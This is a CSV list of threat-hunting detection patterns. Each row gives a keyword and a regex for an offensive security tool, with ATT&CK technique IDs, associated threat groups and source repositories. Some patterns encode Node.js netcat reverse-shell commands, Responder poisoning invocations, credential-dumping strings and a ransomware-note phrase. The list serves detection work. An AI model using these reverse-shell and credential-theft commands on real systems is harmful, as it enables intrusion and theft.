"*require 'evil-proxy'*",".{0,1000}require\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57145"
"*require 'evil-proxy/async'*",".{0,1000}require\s\'evil\-proxy\/async\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57146"
"*require 'evil-proxy/store'*",".{0,1000}require\s\'evil\-proxy\/store\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57147"
"*require('child_process').exec('nc -e ""/bin/bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57148"
"*require('child_process').exec('nc -e ""/bin/sh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/sh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57149"
"*require('child_process').exec('nc -e ""bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57150"
"*require('child_process').exec('nc -e ""cmd"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""cmd\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57151"
"*require('child_process').exec('nc -e ""powershell"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""powershell\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57152"
"*require('child_process').exec('nc -e ""pwsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""pwsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57153"
"*require('child_process').exec('nc -e ""zsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""zsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57154"
"*require('child_process').exec('nc -e sh *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57155"
"*Reset-PSAmsiScanCache *",".{0,1000}Reset\-PSAmsiScanCache\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","57156"
"*reshacker_setup.exe*",".{0,1000}reshacker_setup\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","57157"
"*resocks generate*",".{0,1000}resocks\sgenerate.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57158"
"*resocks listen*",".{0,1000}resocks\slisten.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57159"
"*resocks/proxyrelay*",".{0,1000}resocks\/proxyrelay.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57160"
"*resocks_Windows_x86_64.zip*",".{0,1000}resocks_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57161"
"*ResourceDevelopment_EstablishAccounts_RGPerson.py*",".{0,1000}ResourceDevelopment_EstablishAccounts_RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57164"
"*ResourceDevelopment_Server_DNSLog.py*",".{0,1000}ResourceDevelopment_Server_DNSLog\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57165"
"*ResourceDevelopment_Server_LDAPServer.py*",".{0,1000}ResourceDevelopment_Server_LDAPServer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57166"
"*ResourceDevelopment_WebServices_TencentAPIGateway.py*",".{0,1000}ResourceDevelopment_WebServices_TencentAPIGateway\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57167"
"*Resources/Design/NinjaStyle.ps1*",".{0,1000}Resources\/Design\/NinjaStyle\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","57168"
"*Resources/drone.dll*",".{0,1000}Resources\/drone\.dll.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","57169"
"*Resources\donut.exe*",".{0,1000}Resources\\donut\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","57170"
"*responder * --lm*",".{0,1000}responder\s.{0,1000}\s\-\-lm.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57171"
"*responder -i *",".{0,1000}responder\s\-i\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57172"
"*responder --interface*",".{0,1000}responder\s\-\-interface.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57173"
"*Responder.py -I *",".{0,1000}Responder\.py\s\-I\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","57174"
"*Responder.py*",".{0,1000}Responder\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57175"
"*Responder/tools/MultiRelay/bin/Runas.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Runas\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57176"
"*Responder/tools/MultiRelay/bin/Syssvc.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Syssvc\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57177"
"*Responder\Responder.exe*",".{0,1000}Responder\\Responder\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","57178"
"*ResponderConfigDump *",".{0,1000}ResponderConfigDump\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","57179"
"*responder-http-off*",".{0,1000}responder\-http\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57180"
"*responder-http-on*",".{0,1000}responder\-http\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57181"
"*Responder-Session.log*",".{0,1000}Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57182"
"*responder-smb-off*",".{0,1000}responder\-smb\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57183"
"*responder-smb-on*",".{0,1000}responder\-smb\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57184"
"*Responder-Windows*",".{0,1000}Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57185"
"*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","57187"
"*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57188"
"*restic2john.py*",".{0,1000}restic2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57200"
"*Restore your data possible only buying private key from us*",".{0,1000}Restore\syour\sdata\spossible\sonly\sbuying\sprivate\skey\sfrom\sus.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57201"
"*restore_signature.sh *.dmp*",".{0,1000}restore_signature\.sh\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#linux","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57202"
"*Restore-ServiceEXE -ServiceName *",".{0,1000}Restore\-ServiceEXE\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57204"
"*RestoreServiceModificationVariant.exe*",".{0,1000}RestoreServiceModificationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57205"
"*RestrictedAdmin.exe*",".{0,1000}RestrictedAdmin\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","57206"
"*Results are on disk, enumerating next DC!*",".{0,1000}Results\sare\son\sdisk,\senumerating\snext\sDC!.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","57207"
"*resuming a previous NTDS.DIT dump session *",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57208"
"*resuming a previous NTDS.DIT dump session*",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57209"
"*resutlStrBrwsrOfshit*",".{0,1000}resutlStrBrwsrOfshit.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","57210"
"*-Retrieve Defender ASR Triggered Events -*",".{0,1000}\-Retrieve\sDefender\sASR\sTriggered\sEvents\s\-.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","57211"
"*-Retrieve Defender Exclusion Paths Using Event Logs -*",".{0,1000}\-Retrieve\sDefender\sExclusion\sPaths\sUsing\sEvent\sLogs\s\-.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","57212"
"*Retrieve Domain Cached Credentials hashes from registry*",".{0,1000}Retrieve\sDomain\sCached\sCredentials\shashes\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57213"
"*Retrieve LSA secrets stored in registry*",".{0,1000}Retrieve\sLSA\ssecrets\sstored\sin\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57214"
"*Retrieve password for the account arobbins in the domain testlab*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sarobbins\sin\sthe\sdomain\stestlab.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57215"
